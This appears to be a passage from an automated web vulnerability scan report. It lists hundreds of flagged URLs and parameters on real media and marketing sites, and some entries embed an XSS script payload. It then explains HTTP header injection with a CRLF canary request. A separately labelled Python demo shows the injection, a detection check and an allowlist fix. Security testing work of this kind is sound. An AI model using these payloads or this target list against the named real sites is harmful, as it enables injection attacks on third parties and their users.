2.152. http://idg.com/www/HomeNew.nsf/docs/idg_privacy_policy [REST URL parameter 4]

2.153. http://idg.com/www/HomeNew.nsf/docs/idg_privacy_policy [name of an arbitrarily supplied request parameter]

2.154. http://idg.com/www/HomeNew.nsf/docs/intl_media_contacts [REST URL parameter 1]

2.155. http://idg.com/www/HomeNew.nsf/docs/intl_media_contacts [REST URL parameter 3]

2.156. http://idg.com/www/HomeNew.nsf/docs/intl_media_contacts [REST URL parameter 4]

2.157. http://idg.com/www/HomeNew.nsf/docs/intl_media_contacts [name of an arbitrarily supplied request parameter]

2.158. http://idg.com/www/HomeNew.nsf/docs/licensing [REST URL parameter 1]

2.159. http://idg.com/www/HomeNew.nsf/docs/licensing [REST URL parameter 3]

2.160. http://idg.com/www/HomeNew.nsf/docs/licensing [REST URL parameter 4]

2.161. http://idg.com/www/HomeNew.nsf/docs/licensing [name of an arbitrarily supplied request parameter]

2.162. http://idg.com/www/HomeNew.nsf/docs/media_contacts [REST URL parameter 1]

2.163. http://idg.com/www/HomeNew.nsf/docs/media_contacts [REST URL parameter 3]

2.164. http://idg.com/www/HomeNew.nsf/docs/media_contacts [REST URL parameter 4]

2.165. http://idg.com/www/HomeNew.nsf/docs/media_contacts [name of an arbitrarily supplied request parameter]

2.166. http://idg.com/www/HomeNew.nsf/docs/news_service_bureaus [REST URL parameter 1]

2.167. http://idg.com/www/HomeNew.nsf/docs/news_service_bureaus [REST URL parameter 3]

2.168. http://idg.com/www/HomeNew.nsf/docs/news_service_bureaus [REST URL parameter 4]

2.169. http://idg.com/www/HomeNew.nsf/docs/news_service_bureaus [name of an arbitrarily supplied request parameter]

2.170. http://idg.com/www/HomeNew.nsf/docs/videos [REST URL parameter 1]

2.171. http://idg.com/www/HomeNew.nsf/docs/videos [REST URL parameter 3]

2.172. http://idg.com/www/HomeNew.nsf/docs/videos [REST URL parameter 4]

2.173. http://idg.com/www/HomeNew.nsf/docs/videos [name of an arbitrarily supplied request parameter]

2.174. http://idg.com/www/homenew.nsf [REST URL parameter 1]

2.175. http://idg.com/www/homenew.nsf [name of an arbitrarily supplied request parameter]

2.176. http://idg.com/www/homenew.nsf/06PageStyle.css [REST URL parameter 1]

2.177. http://idg.com/www/homenew.nsf/06PageStyle.css [REST URL parameter 3]

2.178. http://idg.com/www/homenew.nsf/06PageStyle.css [name of an arbitrarily supplied request parameter]

2.179. http://idg.com/www/homenew.nsf/DataRequestor.js [OpenJavascriptLibrary parameter]

2.180. http://idg.com/www/homenew.nsf/DataRequestor.js [REST URL parameter 1]

2.181. http://idg.com/www/homenew.nsf/DataRequestor.js [REST URL parameter 3]

2.182. http://idg.com/www/homenew.nsf/DataRequestor.js [name of an arbitrarily supplied request parameter]

2.183. http://idg.com/www/homenew.nsf/JSLib.js [OpenJavascriptLibrary parameter]

2.184. http://idg.com/www/homenew.nsf/JSLib.js [REST URL parameter 1]

2.185. http://idg.com/www/homenew.nsf/JSLib.js [REST URL parameter 3]

2.186. http://idg.com/www/homenew.nsf/JSLib.js [name of an arbitrarily supplied request parameter]

2.187. http://idg.com/www/homenew.nsf/ajaxroutine.js [OpenJavascriptLibrary parameter]

2.188. http://idg.com/www/homenew.nsf/ajaxroutine.js [REST URL parameter 1]

2.189. http://idg.com/www/homenew.nsf/ajaxroutine.js [REST URL parameter 3]

2.190. http://idg.com/www/homenew.nsf/ajaxroutine.js [name of an arbitrarily supplied request parameter]

2.191. http://idg.com/www/homenew.nsf/awmlib2.js [REST URL parameter 1]

2.192. http://idg.com/www/homenew.nsf/awmlib2.js [REST URL parameter 3]

2.193. http://idg.com/www/homenew.nsf/awmlib2.js [name of an arbitrarily supplied request parameter]

2.194. http://idg.com/www/homenew.nsf/core.js [OpenJavascriptLibrary parameter]

2.195. http://idg.com/www/homenew.nsf/core.js [REST URL parameter 1]

2.196. http://idg.com/www/homenew.nsf/core.js [REST URL parameter 3]

2.197. http://idg.com/www/homenew.nsf/core.js [name of an arbitrarily supplied request parameter]

2.198. http://idg.com/www/homenew.nsf/home [REST URL parameter 1]

2.199. http://idg.com/www/homenew.nsf/home [REST URL parameter 3]

2.200. http://idg.com/www/homenew.nsf/home [name of an arbitrarily supplied request parameter]

2.201. http://idg.com/www/homenew.nsf/home [name of an arbitrarily supplied request parameter]

2.202. http://idg.com/www/homenew.nsf/home [readform parameter]

2.203. http://idg.com/www/homenew.nsf/menu.js [OpenJavascriptLibrary parameter]

2.204. http://idg.com/www/homenew.nsf/menu.js [REST URL parameter 1]

2.205. http://idg.com/www/homenew.nsf/menu.js [REST URL parameter 3]

2.206. http://idg.com/www/homenew.nsf/menu.js [name of an arbitrarily supplied request parameter]

2.207. http://idg.com/www/homenew.nsf/navmain.css [REST URL parameter 1]

2.208. http://idg.com/www/homenew.nsf/navmain.css [REST URL parameter 3]

2.209. http://idg.com/www/homenew.nsf/navmain.css [name of an arbitrarily supplied request parameter]

2.210. http://idg.com/www/homenew.nsf/newsitems.css [REST URL parameter 1]

2.211. http://idg.com/www/homenew.nsf/newsitems.css [REST URL parameter 3]

2.212. http://idg.com/www/homenew.nsf/newsitems.css [name of an arbitrarily supplied request parameter]

2.213. http://idg.com/www/homenew.nsf/public_smo_scripts.js [OpenJavascriptLibrary parameter]

2.214. http://idg.com/www/homenew.nsf/public_smo_scripts.js [REST URL parameter 1]

2.215. http://idg.com/www/homenew.nsf/public_smo_scripts.js [REST URL parameter 3]

2.216. http://idg.com/www/homenew.nsf/public_smo_scripts.js [name of an arbitrarily supplied request parameter]

2.217. http://idg.com/www/homenew.nsf/request.js [OpenJavascriptLibrary parameter]

2.218. http://idg.com/www/homenew.nsf/request.js [REST URL parameter 1]

2.219. http://idg.com/www/homenew.nsf/request.js [REST URL parameter 3]

2.220. http://idg.com/www/homenew.nsf/request.js [name of an arbitrarily supplied request parameter]

2.221. http://idg.com/www/homenew.nsf/screen2.css [REST URL parameter 1]

2.222. http://idg.com/www/homenew.nsf/screen2.css [REST URL parameter 3]

2.223. http://idg.com/www/homenew.nsf/screen2.css [name of an arbitrarily supplied request parameter]

2.224. http://idg.com/www/homenew.nsf/style.css [REST URL parameter 1]

2.225. http://idg.com/www/homenew.nsf/style.css [REST URL parameter 3]

2.226. http://idg.com/www/homenew.nsf/style.css [name of an arbitrarily supplied request parameter]

2.227. http://idg.com/www/homenew.nsf/swfobject.js [REST URL parameter 1]

2.228. http://idg.com/www/homenew.nsf/swfobject.js [REST URL parameter 3]

2.229. http://idg.com/www/homenew.nsf/swfobject.js [name of an arbitrarily supplied request parameter]

2.230. http://idg.com/www/homenew.nsf/tabs.css [REST URL parameter 1]

2.231. http://idg.com/www/homenew.nsf/tabs.css [REST URL parameter 3]

2.232. http://idg.com/www/homenew.nsf/tabs.css [name of an arbitrarily supplied request parameter]

2.233. http://idg.com/www/idgproducts.nsf/2010mklanding.html [REST URL parameter 1]

2.234. http://idg.com/www/idgproducts.nsf/2010mklanding.html [REST URL parameter 3]

2.235. http://idg.com/www/idgproducts.nsf/2010mklanding.html [name of an arbitrarily supplied request parameter]

2.236. http://idg.com/www/idgproducts.nsf/countries [REST URL parameter 1]

2.237. http://idg.com/www/idgproducts.nsf/countries [REST URL parameter 3]

2.238. http://idg.com/www/idgproducts.nsf/countries [name of an arbitrarily supplied request parameter]

2.239. http://idg.com/www/idgproducts.nsf/countries [openview parameter]

2.240. http://idg.com/www/idgproducts.nsf/productfinder [REST URL parameter 1]

2.241. http://idg.com/www/idgproducts.nsf/productfinder [REST URL parameter 3]

2.242. http://idg.com/www/idgproducts.nsf/productfinder [name of an arbitrarily supplied request parameter]

2.243. http://idg.com/www/idgproducts.nsf/productfinder [readform parameter]

2.244. http://idg.com/www/idgproducts.nsf/typeform [REST URL parameter 1]

2.245. http://idg.com/www/idgproducts.nsf/typeform [REST URL parameter 3]

2.246. http://idg.com/www/idgproducts.nsf/typeform [name of an arbitrarily supplied request parameter]

2.247. http://idg.com/www/media.nsf/MRBydate [REST URL parameter 1]

2.248. http://idg.com/www/media.nsf/MRBydate [REST URL parameter 3]

2.249. http://idg.com/www/media.nsf/MRBydate [name of an arbitrarily supplied request parameter]

2.250. http://idg.com/www/media.nsf/MRBydate [readform parameter]

2.251. http://idg.com/www/pr.nsf/PressHome [REST URL parameter 1]

2.252. http://idg.com/www/pr.nsf/PressHome [REST URL parameter 3]

2.253. http://idg.com/www/pr.nsf/PressHome [ReadForm parameter]

2.254. http://idg.com/www/pr.nsf/PressHome [name of an arbitrarily supplied request parameter]

2.255. http://idg.com/www/pr.nsf/PressHome [name of an arbitrarily supplied request parameter]

2.256. http://idg.com/www/pr.nsf/prBydate [REST URL parameter 1]

2.257. http://idg.com/www/pr.nsf/prBydate [REST URL parameter 3]

2.258. http://idg.com/www/pr.nsf/prBydate [name of an arbitrarily supplied request parameter]

2.259. http://idg.com/www/pr.nsf/prBydate [name of an arbitrarily supplied request parameter]

2.260. http://idg.com/www/pr.nsf/prBydate [readform parameter]

2.261. http://info.bisk.com/MCIndex.asp [name of an arbitrarily supplied request parameter]

2.262. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

2.263. http://jsc.madisonlogic.com/jsc [name of an arbitrarily supplied request parameter]

2.264. http://media.crainsnewyork.com/player/playlist.php [REST URL parameter 1]

2.265. http://media.crainsnewyork.com/player/playlist.php [REST URL parameter 1]

2.266. http://media.crainsnewyork.com/player/playlist.php [REST URL parameter 2]

2.267. http://media.crainsnewyork.com/player/playlist.php [REST URL parameter 2]

2.268. http://media.pcadvisor.co.uk/graphics/icons/digg.ico [REST URL parameter 3]

2.269. http://media.pcadvisor.co.uk/graphics/icons/slashdot.ico [REST URL parameter 2]

2.270. http://media.pcadvisor.co.uk/scripts/pca.js [REST URL parameter 2]

2.271. http://media.pcadvisor.co.uk/styles/facebox.css [REST URL parameter 2]

2.272. http://media.pcadvisor.co.uk/styles/pcamac.css [REST URL parameter 2]

2.273. http://resources.cio.com/show/200000223/00056590007964CIO58HH9JQ1JV/ [REST URL parameter 2]

2.274. http://resources.cio.com/show/200000223/00056590007964CIO58HH9JQ1JV/ [REST URL parameter 2]

2.275. http://resources.cio.com/show/200000223/00056590007964CIO58HH9JQ1JV/ [REST URL parameter 3]

2.276. http://resources.cio.com/show/200000223/00056590007964CIO58HH9JQ1JV/ [REST URL parameter 3]

2.277. http://resources.cio.com/show/200000224/00056590007963CIOS94WBH8V1I/ [REST URL parameter 2]

2.278. http://resources.cio.com/show/200000224/00056590007963CIOS94WBH8V1I/ [REST URL parameter 2]

2.279. http://resources.cio.com/show/200000224/00056590007963CIOS94WBH8V1I/ [REST URL parameter 3]

2.280. http://resources.cio.com/show/200000224/00056590007963CIOS94WBH8V1I/ [REST URL parameter 3]

2.281. http://resources.cio.com/show/200000225/00056590007961CIOFJENR82NVR/ [REST URL parameter 2]

2.282. http://resources.cio.com/show/200000225/00056590007961CIOFJENR82NVR/ [REST URL parameter 2]

2.283. http://resources.cio.com/show/200000225/00056590007961CIOFJENR82NVR/ [REST URL parameter 3]

2.284. http://resources.cio.com/show/200000225/00056590007961CIOFJENR82NVR/ [REST URL parameter 3]

2.285. http://resources.cio.com/show/51117387/00026040004262CIOJFKVLDIMHW/ [REST URL parameter 2]

2.286. http://resources.cio.com/show/51117387/00026040004262CIOJFKVLDIMHW/ [REST URL parameter 2]

2.287. http://resources.cio.com/show/51117387/00026040004262CIOJFKVLDIMHW/ [REST URL parameter 3]

2.288. http://resources.cio.com/show/51117387/00026040004262CIOJFKVLDIMHW/ [REST URL parameter 3]

2.289. http://track.adform.net/adfscript/ [name of an arbitrarily supplied request parameter]

2.290. http://www-304.ibm.com/jct03001c/services/learning/ites.wss/us/en [REST URL parameter 5]

2.291. http://www-304.ibm.com/jct03001c/services/learning/ites.wss/us/en [REST URL parameter 6]

2.292. http://www-304.ibm.com/jct03001c/services/learning/ites.wss/zz/en [REST URL parameter 5]

2.293. http://www-304.ibm.com/jct03001c/services/learning/ites.wss/zz/en [REST URL parameter 6]

2.294. http://www.aaaa.org/pages/eweb.aspx [name of an arbitrarily supplied request parameter]

2.295. https://www.aaaa.org/pages/eweb.aspx [name of an arbitrarily supplied request parameter]

2.296. http://www.adotas.com/ [name of an arbitrarily supplied request parameter]

2.297. http://www.adotas.com/2010/12/doubleverify-to-deliver-forward-is-with-verification/ [REST URL parameter 3]

2.298. http://www.adotas.com/about/ [REST URL parameter 1]

2.299. http://www.adotas.com/wp/wp-content/plugins/flash-album-gallery/admin/js/swfaddress.js [REST URL parameter 6]

2.300. http://www.adotas.com/wp/wp-content/plugins/flash-album-gallery/admin/js/swfobject.js [REST URL parameter 6]

2.301. http://www.adotas.com/wp/wp-content/plugins/polls/polls-css.css [REST URL parameter 4]

2.302. http://www.adotas.com/wp/wp-content/plugins/polls/polls-js.php [REST URL parameter 4]

2.303. http://www.adotas.com/wp/wp-content/wp-recommend/recommend.popup.php [REST URL parameter 1]

2.304. http://www.adotas.com/wp/wp-content/wp-recommend/recommend.popup.php [REST URL parameter 2]

2.305. http://www.adotas.com/wp/wp-content/wp-recommend/recommend.popup.php [REST URL parameter 3]

2.306. http://www.adotas.com/wp/wp-content/wp-recommend/recommend.popup.php [name of an arbitrarily supplied request parameter]

2.307. http://www.adotas.com/wp/wp-includes/js/tw-sack.js [REST URL parameter 3]

2.308. http://www.adotas.com/wp/xmlrpc.php [REST URL parameter 1]

2.309. http://www.btobonline.com/apps/pbcs.dll/article [name of an arbitrarily supplied request parameter]

2.310. http://www.computerworld.dk/art/112943 [REST URL parameter 2]

2.311. http://www.computerworld.dk/art/112943 [name of an arbitrarily supplied request parameter]

2.312. http://www.idc.com/ [name of an arbitrarily supplied request parameter]

2.313. http://www.idg.com/ [name of an arbitrarily supplied request parameter]

2.314. http://www.idg.com/www/HomeNew.nsf/docs/U.S._Sales [REST URL parameter 1]

2.315. http://www.idg.com/www/HomeNew.nsf/docs/U.S._Sales [REST URL parameter 3]

2.316. http://www.idg.com/www/HomeNew.nsf/docs/U.S._Sales [REST URL parameter 4]

2.317. http://www.idg.com/www/HomeNew.nsf/docs/U.S._Sales [name of an arbitrarily supplied request parameter]

2.318. http://www.idg.com/www/HomeNew.nsf/docs/about_IDG [REST URL parameter 1]

2.319. http://www.idg.com/www/HomeNew.nsf/docs/about_IDG [REST URL parameter 3]

2.320. http://www.idg.com/www/HomeNew.nsf/docs/about_IDG [REST URL parameter 4]

2.321. http://www.idg.com/www/HomeNew.nsf/docs/about_IDG [name of an arbitrarily supplied request parameter]

2.322. http://www.idg.com/www/idgdir.nsf/ContactSearch [REST URL parameter 1]

2.323. http://www.idg.com/www/idgdir.nsf/ContactSearch [REST URL parameter 3]

2.324. http://www.idg.com/www/idgdir.nsf/ContactSearch [name of an arbitrarily supplied request parameter]

2.325. http://www.idg.com/www/idgdir.nsf/ContactSearch [name of an arbitrarily supplied request parameter]

2.326. http://www.idg.com/www/idgdir.nsf/ContactSearch [readForm parameter]

2.327. http://www.idg.com/www/pr.nsf/pr_rss [REST URL parameter 1]

2.328. http://www.idg.com/www/pr.nsf/pr_rss [REST URL parameter 3]

2.329. http://www.idg.com/www/pr.nsf/pr_rss [name of an arbitrarily supplied request parameter]

2.330. http://www.idgknowledgehub.com/blogs/ [cat parameter]

2.331. http://www.idgknowledgehub.com/blogs/ [tag parameter]

2.332. http://www.idgknowledgehub.com/library/ [video parameter]

2.333. http://www.idgmarketfusion.com/ [name of an arbitrarily supplied request parameter]

2.334. http://www.infoprint.com/internet/wwsites.nsf/vwWebPublished/sol_explore-precision-marketing_us [REST URL parameter 3]

2.335. http://www.infoprint.com/internet/wwsites.nsf/vwWebPublished/sol_explore-precision-marketing_us [REST URL parameter 4]

2.336. http://www.infoprint.com/internet/wwsites.nsf/vwWebPublished/sol_explore-precision-marketing_us [name of an arbitrarily supplied request parameter]

2.337. http://www.infoprint.com/precisionmarketing [name of an arbitrarily supplied request parameter]

2.338. http://www.infoworld.com/ [name of an arbitrarily supplied request parameter]

2.339. http://www.infoworld.com/ [source parameter]

2.340. http://www.infoworld.com/d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429 [REST URL parameter 1]

2.341. http://www.infoworld.com/d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429 [REST URL parameter 2]

2.342. http://www.infoworld.com/d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429 [REST URL parameter 2]

2.343. http://www.infoworld.com/d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429 [REST URL parameter 3]

2.344. http://www.infoworld.com/d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429 [name of an arbitrarily supplied request parameter]

2.345. http://www.infoworld.com/d/cloud-computing/googles-stealthy-plan-get-you-microsoft-exchange-429 [source parameter]

2.346. http://www.insight24.com/utilApp/webcastcentral/index.jsp [partnerref parameter]

2.347. http://www.insight24.com/utilApp/webcastcentral/index.jsp [partnerref parameter]

2.348. http://www.insight24.com/utilApp/webcastcentral/index.jsp [partnerref parameter]

2.349. http://www.linuxworld.com/ [name of an arbitrarily supplied request parameter]

2.350. http://www.lunametrics.com/blog/ [REST URL parameter 1]

2.351. http://www.lunametrics.com/blog/ [REST URL parameter 1]

2.352. http://www.lunametrics.com/blog/ [name of an arbitrarily supplied request parameter]

2.353. http://www.mailchimp.com/blog/ [name of an arbitrarily supplied request parameter]

2.354. http://www.marketingvox.com/ [name of an arbitrarily supplied request parameter]

2.355. http://www.minonline.com/news/IDG-Shrinks-Microsite-Down-to-Ad-Size_16055.html [REST URL parameter 1]

2.356. http://www.minonline.com/news/IDG-Shrinks-Microsite-Down-to-Ad-Size_16055.html [REST URL parameter 2]

2.357. http://www.minonline.com/news/IDG-Shrinks-Microsite-Down-to-Ad-Size_16055.html [REST URL parameter 2]

2.358. http://www.networkworld.com/ [name of an arbitrarily supplied request parameter]

2.359. http://www.pcadvisor.co.uk/news/index.cfm [name of an arbitrarily supplied request parameter]

2.360. http://www.pcadvisor.co.uk/news/index.cfm [rss parameter]

2.361. http://www.pcw.gr/Article/FN/Adobe_Deloitte_in_common_application_development/69-5467.html [REST URL parameter 4]

2.362. http://www.pcw.gr/Article/FN/Adobe_Deloitte_in_common_application_development/69-5467.html [name of an arbitrarily supplied request parameter]

2.363. http://www.pcworld.it/notizia/120817/2010-12-16/LG-Optimus-2X-il-primo-smartphone-dual-core.html [REST URL parameter 2]

2.364. http://www.pcworld.it/notizia/120817/2010-12-16/LG-Optimus-2X-il-primo-smartphone-dual-core.html [REST URL parameter 3]

2.365. http://www.pcworld.it/notizia/120817/2010-12-16/LG-Optimus-2X-il-primo-smartphone-dual-core.html [REST URL parameter 4]

2.366. http://www.plasticsnews.com/china/english/ [name of an arbitrarily supplied request parameter]

2.367. http://www.publish2.com/contact [name of an arbitrarily supplied request parameter]

2.368. http://www.publish2.com/login [name of an arbitrarily supplied request parameter]

2.369. http://www.publish2.com/search/links [callback parameter]

2.370. http://www.publish2.com/search/links [name of an arbitrarily supplied request parameter]

2.371. http://www.publish2.com/search/links [number_of_items parameter]

2.372. http://www.publish2.com/search/links [tag parameter]

2.373. http://www.publish2.com/search/links.js [callback parameter]

2.374. http://www.publish2.com/search/links.js [name of an arbitrarily supplied request parameter]

2.375. http://www.publish2.com/search/links.js [newsgroup parameter]

2.376. http://www.publish2.com/search/links.js [number_of_items parameter]

2.377. http://www.publish2.com/search/links.js [tag parameter]

2.378. http://www.publish2.com/search/links.rss [callback parameter]

2.379. http://www.publish2.com/search/links.rss [name of an arbitrarily supplied request parameter]

2.380. http://www.publish2.com/search/links.rss [newsgroup parameter]

2.381. http://www.publish2.com/search/links.rss [number_of_items parameter]

2.382. http://www.publish2.com/search/links.rss [tag parameter]

2.383. http://www.publish2.com/search/links.xml [callback parameter]

2.384. http://www.publish2.com/search/links.xml [name of an arbitrarily supplied request parameter]

2.385. http://www.publish2.com/search/links.xml [newsgroup parameter]

2.386. http://www.publish2.com/search/links.xml [number_of_items parameter]

2.387. http://www.publish2.com/search/links.xml [tag parameter]

2.388. http://www.publish2.com/syndicate/widget/ [comment_font_family parameter]

2.389. http://www.publish2.com/syndicate/widget/ [comment_font_size parameter]

2.390. http://www.publish2.com/syndicate/widget/ [feed parameter]

2.391. http://www.publish2.com/syndicate/widget/ [feed_type parameter]

2.392. http://www.publish2.com/syndicate/widget/ [headline_font_color parameter]

2.393. http://www.publish2.com/syndicate/widget/ [headline_font_decoration parameter]

2.394. http://www.publish2.com/syndicate/widget/ [headline_font_family parameter]

2.395. http://www.publish2.com/syndicate/widget/ [headline_font_size parameter]

2.396. http://www.publish2.com/syndicate/widget/ [headline_font_weight parameter]

2.397. http://www.publish2.com/syndicate/widget/ [name of an arbitrarily supplied request parameter]

2.398. http://www.publish2.com/syndicate/widget/ [number_of_items parameter]

2.399. http://www.publish2.com/syndicate/widget/ [title parameter]

2.400. http://www.publish2.com/syndicate/widget/ [widget_src parameter]

2.401. http://www.publish2.com/widget/display/publish2_widget_html_61657798d9d56955d570ac504ad152e9/ [feed parameter]

2.402. http://www.seomoz.org/blog [name of an arbitrarily supplied request parameter]

2.403. http://www.seomoz.org/blog [name of an arbitrarily supplied request parameter]

2.404. http://www.sixapart.com/favicon.ico [REST URL parameter 1]

2.405. http://www.sixapart.com/ns/at [REST URL parameter 1]

2.406. http://www.sixapart.com/ns/at [REST URL parameter 2]

2.407. http://www.sixapart.com/ns/at [name of an arbitrarily supplied request parameter]

2.408. http://www.sixapart.com/ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C/script%3Eddc017331/at [REST URL parameter 1]

2.409. http://www.sixapart.com/ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C/script%3Eddc017331/at [REST URL parameter 2]

2.410. http://www.sixapart.com/ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C/script%3Eddc017331/at [REST URL parameter 3]

2.411. http://www.sixapart.com/ns21bc1%22%3E%3Cscript%3Ealert(XSS)%3C/script%3Eddc017331/at [name of an arbitrarily supplied request parameter]

2.412. http://www.staffingindustry.com/ME2/dirmod.asp [mod parameter]

2.413. http://www.strongmail.com/resources/blogs/email_marketing_insights' [REST URL parameter 3]

2.414. http://www.strongmail.com/resources/blogs/email_marketing_insights/ [REST URL parameter 3]

2.415. http://www.strongmail.com/resources/blogs/js/app.js [REST URL parameter 3]

2.416. http://www.strongmail.com/resources/blogs/js/app.js [REST URL parameter 4]

2.417. http://www.strongmail.com/resources/blogs/js/cufon.js [REST URL parameter 3]

2.418. http://www.strongmail.com/resources/blogs/js/cufon.js [REST URL parameter 4]

2.419. http://www.strongmail.com/resources/blogs/js/jquery-1.2.6.min.js [REST URL parameter 3]

2.420. http://www.strongmail.com/resources/blogs/js/jquery-1.2.6.min.js [REST URL parameter 4]

2.421. http://www.stumbleupon.com/submit [url parameter]

2.422. http://www.typepad.com/services/toolbar [autofollowed parameter]

2.423. http://www14.software.ibm.com/webapp/download/byproduct.jsp [REST URL parameter 3]

2.424. http://www.adotas.com/ [User-Agent HTTP header]

2.425. http://www.adotas.com/2010/12/doubleverify-to-deliver-forward-is-with-verification/ [User-Agent HTTP header]

2.426. http://www.adotas.com/about/ [User-Agent HTTP header]

2.427. http://www.infoprint.com/internet/wwsites.nsf/vwWebPublished/sol_explore-precision-marketing_us [Referer HTTP header]

2.428. http://www.infoprint.com/precisionmarketing [Referer HTTP header]

2.429. http://www.itworldcanada.com/news/career-advice-running-projects-across-time-zones/142135 [Referer HTTP header]

2.430. http://www.itworldcanada.com/news/career-advice-running-projects-across-time-zones/142135 [Referer HTTP header]

2.431. http://www.linuxworld.com/ [Referer HTTP header]

2.432. http://www.networkworld.com/ [Referer HTTP header]

2.433. http://www.quantcast.com/p-25K88fxDSEn9Y [Referer HTTP header]

2.434. http://www.quantcast.com/p-34PxbSficBeTc [Referer HTTP header]

2.435. http://www.quantcast.com/p-fcYWUmj5YbYKM [Referer HTTP header]

2.436. http://seg.sharethis.com/getSegment.php [__stid cookie]

2.437. http://www.idgtechpanel.com/ [name of an arbitrarily supplied request parameter]



1. HTTP header injection
There are 12 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters (CR LF, sent URL-encoded as %0d%0a in the requests below and decoded by the server before the value is copied) into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected. The check must run on the decoded value, since the payloads in this report arrive URL-encoded and are only turned into raw CR LF by the server's own decoding.
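The following Python is an added example, not code from this report or from any of the sites it lists: it reproduces the Set-Cookie injection pattern of instances 1.1 and 1.2 with a constructed server stand-in, parses the resulting response the way a browser or proxy would, applies the scanner's own detection logic (does the text after %0d%0a open a header line of its own?), shows the empty-line variant that splits the response into a new body, and contrasts the vulnerable copy with the alphanumeric allowlist recommended above. The payload shape copies the report's canaries; the cookie layout, the function names and the split payload are assumptions made for the demo.

```python
"""Added example: CRLF / HTTP header injection (CWE-113) and its remediation.
Server-side functions are constructed stand-ins, not serving-sys.com code."""
import re
import urllib.parse
from typing import List, Tuple

# Constructed canary in the report's shape; decodes to "56b52\r\nd5a67d15b17".
PAYLOAD = "56b52%0d%0ad5a67d15b17"
# Constructed response-splitting payload: the empty line ends the header
# block, so everything after it is treated as the response body.
SPLIT_PAYLOAD = "x%0d%0a%0d%0a<html>injected</html>"


def vulnerable_set_cookie(cookie_value: str) -> bytes:
    """Hypothetical server: URL-decodes a client-controlled value and copies it
    straight into Set-Cookie, the pattern flagged in instances 1.1 and 1.2."""
    decoded = urllib.parse.unquote(cookie_value)
    lines = [
        "HTTP/1.1 200 OK",
        "Content-Type: text/html",
        "Set-Cookie: eyeblaster=WMPV=0" + decoded + "; path=/",
        "Content-Length: 0",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


def split_response(raw: bytes) -> Tuple[List[str], bytes]:
    """Parse as a browser or proxy does: headers end at the first empty line
    (CRLF CRLF); whatever follows is the body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    return lines[1:], body  # drop the status line


def injected_header_lines(raw: bytes, payload: str) -> List[str]:
    """Scanner-style check: if the text after %0d%0a opens its own header
    line, the CRLF was reflected unencoded and a header was injected."""
    _, _, tail = urllib.parse.unquote(payload).partition("\r\n")
    headers, _ = split_response(raw)
    return [h for h in headers if h.startswith(tail)]


# Remediation: short alphanumeric strings only; everything else is rejected.
HEADER_SAFE = re.compile(r"[A-Za-z0-9]{1,64}")


def is_safe_header_value(value: str) -> bool:
    """Validate after URL-decoding, since that is the form copied into the
    header; any ASCII control character (< 0x20) fails, as does anything
    outside the alphanumeric allowlist."""
    decoded = urllib.parse.unquote(value)
    if any(ord(c) < 0x20 for c in decoded):
        return False
    return HEADER_SAFE.fullmatch(decoded) is not None


def hardened_set_cookie(cookie_value: str) -> bytes:
    """Same response, but refuses to emit a header from an unsafe value."""
    if not is_safe_header_value(cookie_value):
        raise ValueError("rejected unsafe header value")
    # The value passed the allowlist, so the copy below cannot carry CR or LF.
    return vulnerable_set_cookie(cookie_value)


if __name__ == "__main__":
    print(injected_header_lines(vulnerable_set_cookie(PAYLOAD), PAYLOAD))
    print(split_response(vulnerable_set_cookie(SPLIT_PAYLOAD))[1][:22])
    try:
        hardened_set_cookie(PAYLOAD)
    except ValueError as exc:
        print("hardened:", exc)
```

Run stand-alone, the first line printed is the injected header line (`d5a67d15b17; path=/`), the second is the attacker-controlled start of the body, and the third shows the hardened variant refusing the canary. The same `injected_header_lines` check works unchanged for the Location-header instances later in this section, since it only looks at where the post-CRLF half of the payload lands in the parsed header list.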


1.1. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/BannerSource.asp

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 56b52%0d%0ad5a67d15b17 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/BannerSource.asp HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
